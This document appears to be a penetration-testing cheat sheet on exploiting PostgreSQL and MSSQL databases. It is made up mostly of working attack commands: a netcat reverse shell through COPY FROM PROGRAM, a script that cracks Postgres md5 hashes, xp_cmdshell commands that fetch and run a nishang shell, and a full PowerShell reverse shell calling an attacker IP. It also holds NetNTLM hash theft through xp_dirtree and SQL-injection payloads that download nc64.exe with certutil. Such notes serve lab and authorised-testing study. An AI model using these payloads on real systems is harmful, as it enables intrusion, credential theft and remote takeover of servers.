# Database Explotation

## PostgreSQL Command Execution

### Using COPY TO/FROM PROGRAM

Installations running Postgres 9.3 and above have functionality which allows for the superuser and users with '`pg_execute_server_program`' to pipe to and from an external program using `COPY`.

**Check if the user is superuser**

```sql
SHOW is_superuser; 
SELECT current_setting('is_superuser');
SELECT usesuper FROM pg_user WHERE usename = CURRENT_USER;
```

```sql
CREATE TABLE shell(output text);
COPY shell FROM PROGRAM 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP PORT >/tmp/f';
```

### PostgreSQL Cracking (md5 password + username)

The hashes from pg\_shadow uses that format -> `md5(password + username)`

If we are not able to crack the md5 hash of postgres we can use this script.

```python
import hashlib

target_hash = "md5ae8c67affdb169a42c9631c02fc67ede"
username = "rubben"

with open("/usr/share/wordlists/rockyou.txt", "r", encoding="latin-1") as f:
    for line in f:
        password = line.strip()
        combo = password + username
        hashed = "md5" + hashlib.md5(combo.encode()).hexdigest()
        if hashed == target_hash:
            print(f"[+] Password found: {password}")
            break
```

## MSSQL

#### Check privileges

```
SELECT IS_SRVROLEMEMBER('sysadmin')
```

#### Enable xp\_cmdshell (With privileges)

```
enable_xp_cmdshell
```

For establishing reverse shell (rev.ps1 is nishang shell):

{% code overflow="wrap" %}

```
EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://10.8.6.125/rev.ps1") | powershell -noprofile'

EXEC xp_cmdshell 'powershell -nop -w hidden -c "$c=New-Object Net.Sockets.TCPClient(''10.8.6.125'',4444);$s=$c.GetStream();[byte[]]$b=0..65535|%{0};while(($i=$s.Read($b,0,$b.Length)) -ne 0){;$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0,$i);$r=(iex $d 2>&1 | Out-String );$r2=$r+''PS ''+$env:COMPUTERNAME+''> ''; $s.Write(([text.encoding]::ASCII).GetBytes($r2),0,$r2.Length)}"'
```

{% endcode %}

**Other Method**

```
impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
```

#### \*\*Steal NetNTLM Hash / Relay Attack (\*\*Without privileges)

Though we can’t execute commands using xp\_cmdshell we can steal hashes of the SQL service account by using xp\_dirtree or xp\_fileexist.

```
exec xp_dirtree '\\<ip>\smbFolder\file'
```

And with the smbserver grab the hash:

```
impacket-smbserver smbFolder $(pwd) -smb2support
```

### Enable xp\_cmdshell via SQL Injection

```
';EXEC sp_configure 'show advanced options', 1;--
';RECONFIGURE;--
';EXEC sp_configure "xp_cmdshell", 1;--
';RECONFIGURE;--

';EXEC xp_cmdshell "certutil -urlcache -f http://kali_ip/nc64.exe c:/windows/temp/nc64.exe";-- 

';EXEC xp_cmdshell "c:/windows/temp/nc64.exe IP PORT -e cmd";-- 
```